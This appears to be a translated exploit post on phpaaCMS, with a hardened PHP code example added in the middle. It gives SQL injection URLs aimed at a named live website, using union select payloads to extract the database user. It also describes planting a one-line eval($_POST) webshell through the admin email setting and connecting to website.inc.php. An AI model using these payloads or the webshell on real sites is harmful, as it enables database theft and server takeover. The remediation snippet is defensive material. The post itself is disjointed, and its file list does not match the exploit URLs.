A vulnerability called Brother Fei. A lot of holes have been exposed. Er, I used to think PHPaa was safe.
Why can't Daniel see it? I like injection, so let's just inject it. For the others, search Baidu.
Vulnerable files:
admin/page.add.php
admin/message.action.php
admin/article.add.php
search.php
$userid = trim($_GET['userid']) ? trim($_GET['userid']) : 0; // only spaces are filtered
// $userid is concatenated into the SQL string without validation or quoting
find("select * from phpaadb_users where userid=" . $userid);
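The vulnerability in the above three pages is caused by lax filtering of userid: trim() only strips surrounding whitespace, so the rest of the parameter reaches the SQL statement unchanged.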
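A hardened form of the userid lookup above, as an added example (not phpaaCMS code and not from the original post). It assumes PDO with an in-memory SQLite database; the column names, sample row, and the helper names parse_userid and find_user are hypothetical, and only the table name phpaadb_users comes from the page.

```php
<?php
// Added example: strict integer validation plus a bound parameter in place of
// trim() and string concatenation. Schema and row are constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE phpaadb_users (userid INTEGER PRIMARY KEY, username TEXT, email TEXT)');
$pdo->exec("INSERT INTO phpaadb_users VALUES (31, 'editor', 'editor@example.test')");

// Hypothetical helper: accept only a positive decimal integer, else null.
function parse_userid($raw): ?int
{
    if (!is_string($raw)) {
        return null; // missing parameter or userid[]=... array input
    }
    $id = filter_var(trim($raw), FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hypothetical helper: the value is bound as an integer, never spliced into SQL.
function find_user(PDO $pdo, $raw): ?array
{
    $id = parse_userid($raw);
    if ($id === null) {
        return null; // reject instead of silently falling back to 0
    }
    $stmt = $pdo->prepare(
        'SELECT userid, username, email FROM phpaadb_users WHERE userid = :userid'
    );
    $stmt->bindValue(':userid', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed inputs: valid ids, the two malformed values seen in the page's
// URLs, an array parameter, and a missing parameter.
$samples = ['31', ' 31 ', '31 union select 1,user(),3', "32'", ['31'], null];
foreach ($samples as $raw) {
    $row = find_user($pdo, $raw);
    printf("%-34s => %s\n", json_encode($raw), $row ? json_encode($row) : 'rejected');
}
```

The same pattern applies to the id and cid parameters used by the other admin pages: validate the type first, then bind the value.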
Exploit (EXP):
http://www.tmdsb.com/admin/friendlink.add.php?act=edit&id=1%20and%201=2%20union%20select%201,2,3,user%28%29,5,6
http://www.tmdsb.com/phpaaCMS/admin/user.add.php?act=edit,&userid=31 union select 1,user(),3
http://www.tmdsb.com/admin/article.add.php?act=add&cid=1&id=32%27
The webshell method is as follows:
The attacker logs in to the admin back end with the administrator's account and password. The website configuration area has an administrator email address field. Directly write a one-sentence webshell into it: /")?>
eval($_POST[tmd] //
Then connect to website.inc.php.